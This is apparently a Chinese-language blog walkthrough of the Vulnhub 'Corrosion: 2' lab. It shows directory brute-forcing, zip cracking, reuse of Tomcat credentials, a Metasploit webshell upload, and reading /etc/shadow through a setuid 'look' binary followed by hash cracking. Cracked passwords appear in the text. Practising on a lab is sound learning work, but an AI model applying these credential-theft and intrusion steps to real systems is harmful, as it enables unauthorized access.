Vulnhub-CORROSION-2
title: 'Vulnhub-CORROSION: 2'
tags: Vulnhub
abbrlink: cb0f1354
date: 2022-12-04 09:38:51
描述
- Name: Corrosion: 2
- Date release: 21 Sep 2021
- Author: Proxy Programmer
- Series: Corrosion
Difficulty: Medium
Hint: Enumeration is key.
存活
kali 192.168.169.220
靶机 192.168.169.230
靶机
端口 22 80 8080
80
8080
目录爆破
gobuster dir -u http://192.168.169.230/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
http://192.168.169.230/ 80端口的没跑出来
- 试一下8080
gobuster dir -u http://192.168.169.230:8080/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
两个文件
readme
Hey randy! It's your System Administrator. I left you a file on the server, I'm sure nobody will find it.
Also remember to use that password I gave you.
嘿,Randy! 我是你的系统管理员。我在服务器上给你留了一个文件,我相信没有人会发现它。
另外,记得使用我给你的密码。
backup
- 上面提示的应该是这个文件
- 爆破压缩包
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip
- tomcat-users
manager /melehifokivai
admin /melehifokivai
```
这两都是可以登陆的,那账号密码没问题,找到了上传的地方,但试了下没啥反应.
msf 有个 Tomcat 上传webshell的模块,有用户名和密码就可以使用:
漏洞利用
- msf
msfconsole
- 搜索漏洞
search tomcat upload
- 使用
use 3
- 设置
- 检查一下
个人失误 : 靶机IP 192.168.169.230
- 开始攻击
run
查看文件
因为 randy 下的文件不能修改,一些关键文件也无法查看,而/home/jaye 文件夹里的文件没有权限查看:
尝试一下切换成 jaye 用户,密码还是用刚才发现的 Tomcat 密码:
可以ssh
这里再jaye的目录下发现了look文件,查看一番后,发现他是系统的文件,这里可以进行越权访问,然后cat命令这里是用不了的,看了大佬们的提示,这里需要用到LFILE,该命令等同于file_to_read。读取一下shadow和passwd的文件内容
```
LFILE=/etc/shadow
./look '' "$LFILE"
- 读取passwd和shadow的文件
passwd下载
- 再使用
unshadow命令将这两个文件生成需要破解的文件。
unshadow passwd shadow > password.txt
- 破解 -看帖子说要好久
借用大佬的
melehifokivai (jaye)
07051986randy (randy)
- ssh连接
提权
- 跟着大佬操作
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 putdown.top